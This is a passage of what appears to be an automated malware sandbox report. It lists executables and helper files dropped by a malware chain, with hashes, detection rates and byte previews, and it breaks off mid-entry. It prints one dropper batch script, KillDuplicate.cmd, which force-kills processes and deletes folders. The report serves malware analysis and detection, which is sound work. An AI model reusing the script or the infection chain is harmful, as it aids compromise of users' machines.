                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):765568
                                                                                                                                                                  Entropy (8bit):7.855393940952922
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:4mOcxtujRb4+DR8KwzkS5AMtCxCz3z8JAS3p9+TPtN4+DR8KwzkS5AMtCxCz3z8U:lGtPWQ8C8z3zcB59CNPWQ8C8z3zcB590
                                                                                                                                                                  MD5:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                  SHA1:00296EA6A56F6E10A0F1450A20C5FB329B8856C1
                                                                                                                                                                  SHA-256:3D51B9523B387859BC0D94246DFB216CFA82F9D650C8D11BE11ED67F70E7440B
                                                                                                                                                                  SHA-512:1472E4670F469C43227B965984ECC223A526F6284363D8E08A3B5B55E602CCCE62DF4BC49939EE5BD7DF7B0C26E20DA896B084ECCAB767F8728E6BF14D71C840
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........`......................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):776832
                                                                                                                                                                  Entropy (8bit):7.859727158445845
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
                                                                                                                                                                  MD5:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                  SHA1:3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
                                                                                                                                                                  SHA-256:C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
                                                                                                                                                                  SHA-512:928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1986048
                                                                                                                                                                  Entropy (8bit):7.952753928793905
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:XK5IeeNzsjPkcGafWrMJKaWsho/KKRdg2:XK+TzKPZGbwgsi/7g
                                                                                                                                                                  MD5:74C0FEC1D8D8E4C943BAED136DCF9E56
                                                                                                                                                                  SHA1:6399DEA373FC53B963A41547516D50E5A313E603
                                                                                                                                                                  SHA-256:C3DC29ECDD50DACFF125E3743FD3153837CC3869C6EEB8195996790013FA6EA1
                                                                                                                                                                  SHA-512:1DF952E2A6A0E743FD984612DB915AC179B8F5C42284C90649BDB085C8136746136D98DCBE0EA038CB43EE6990A4D871B0A0305E12A29CB9FD3B805800D9A82A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.|...^........K...........@...........................K.....x.....@.................................V...j.......l........................................................................................................... . .........<..................@....rsrc...l............L..............@....idata .............T..............@... ..)..........V..............@...hrqcmbfk......1......X..............@...baxohzut......K......(..............@....taggant.0....K.."...,..............@...........................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:NlllulvvS///Z:NllUi
                                                                                                                                                                  MD5:55BC955DC3003949E539647F9FBE420D
                                                                                                                                                                  SHA1:BF2448042589EBF7D4DF5590F9FCDDD65D091BEE
                                                                                                                                                                  SHA-256:9D89A8C1E8F6E379DFB09D13BF027251D33BD5C5ED903242EF2AA76482890D71
                                                                                                                                                                  SHA-512:F20E3FC2724FA273DD183D178EDC21BFE56888E6409FE7028401816413F2BC69157A1ABDD265349744E41845985B8087DCF62C9E75F5637D1413B6B258B1C838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:@...e...................................7............@..........

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):765568
                                                                                                                                                                  Entropy (8bit):7.855393940952922
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:4mOcxtujRb4+DR8KwzkS5AMtCxCz3z8JAS3p9+TPtN4+DR8KwzkS5AMtCxCz3z8U:lGtPWQ8C8z3zcB59CNPWQ8C8z3zcB590
                                                                                                                                                                  MD5:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                  SHA1:00296EA6A56F6E10A0F1450A20C5FB329B8856C1
                                                                                                                                                                  SHA-256:3D51B9523B387859BC0D94246DFB216CFA82F9D650C8D11BE11ED67F70E7440B
                                                                                                                                                                  SHA-512:1472E4670F469C43227B965984ECC223A526F6284363D8E08A3B5B55E602CCCE62DF4BC49939EE5BD7DF7B0C26E20DA896B084ECCAB767F8728E6BF14D71C840
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........`......................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):776832
                                                                                                                                                                  Entropy (8bit):7.859727158445845
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
                                                                                                                                                                  MD5:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                  SHA1:3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
                                                                                                                                                                  SHA-256:C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
                                                                                                                                                                  SHA-512:928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4438776
                                                                                                                                                                  Entropy (8bit):7.99505709582503
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                  MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                  SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                  SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                  SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                  Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1986048
                                                                                                                                                                  Entropy (8bit):7.952753928793905
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:XK5IeeNzsjPkcGafWrMJKaWsho/KKRdg2:XK+TzKPZGbwgsi/7g
                                                                                                                                                                  MD5:74C0FEC1D8D8E4C943BAED136DCF9E56
                                                                                                                                                                  SHA1:6399DEA373FC53B963A41547516D50E5A313E603
                                                                                                                                                                  SHA-256:C3DC29ECDD50DACFF125E3743FD3153837CC3869C6EEB8195996790013FA6EA1
                                                                                                                                                                  SHA-512:1DF952E2A6A0E743FD984612DB915AC179B8F5C42284C90649BDB085C8136746136D98DCBE0EA038CB43EE6990A4D871B0A0305E12A29CB9FD3B805800D9A82A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.|...^........K...........@...........................K.....x.....@.................................V...j.......l........................................................................................................... . .........<..................@....rsrc...l............L..............@....idata .............T..............@... ..)..........V..............@...hrqcmbfk......1......X..............@...baxohzut......K......(..............@....taggant.0....K.."...,..............@...........................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_au5t1jvr.hjy.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mckjazhl.twj.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfbyrwlk.lxd.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfjwj4y2.hne.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2943488
                                                                                                                                                                  Entropy (8bit):6.542697972844218
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:4ec0z/YLlWxLAYD4LdIS7YRsgesjOT/aADjxyRyznuRr3iNQ8TKSurHU8wyRHUvI:jDk0L9sKSGdW/HVl9iHzw7aipAP
                                                                                                                                                                  MD5:65F41A5703887BEEBA49A84CA30BAE19
                                                                                                                                                                  SHA1:1AE160165E2BA85F3B90D34B451FE965CE51701E
                                                                                                                                                                  SHA-256:E99443934269E932C08BF7928DA5FF5C5FAE2CC72794380D5F7F7A2D0F7BC46E
                                                                                                                                                                  SHA-512:62D2C181B59A8D74978F7A9A335472C119E599C3106C979FB3F02663D22BECB7C584D84F6DD6C4B4499997D72EC67CF4274643A4AE09485A90AE8F543CE9F6BB
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................0...........@...........................0.....9.-...@.................................W...k............................}0..............................}0..................................................... . ............................@....rsrc...............................@....idata ............................@...eokeitfr..).......).................@...xdqbfquo......0.......,.............@....taggant.0....0.."....,.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\7z.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe
                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1679360
                                                                                                                                                                  Entropy (8bit):6.278252955513617
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                  MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                  SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                  SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                  SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\7z.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe
                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):468992
                                                                                                                                                                  Entropy (8bit):6.157743912672224
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                  MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                  SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                  SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                  SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):222
                                                                                                                                                                  Entropy (8bit):4.855194602218789
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                  MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                  SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                  SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                  SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2355713
                                                                                                                                                                  Entropy (8bit):5.891648193754473
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
                                                                                                                                                                  MD5:579A63BEBCCBACAB8F14132F9FC31B89
                                                                                                                                                                  SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
                                                                                                                                                                  SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
                                                                                                                                                                  SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1799594
                                                                                                                                                                  Entropy (8bit):7.99773141173711
                                                                                                                                                                  Encrypted:true
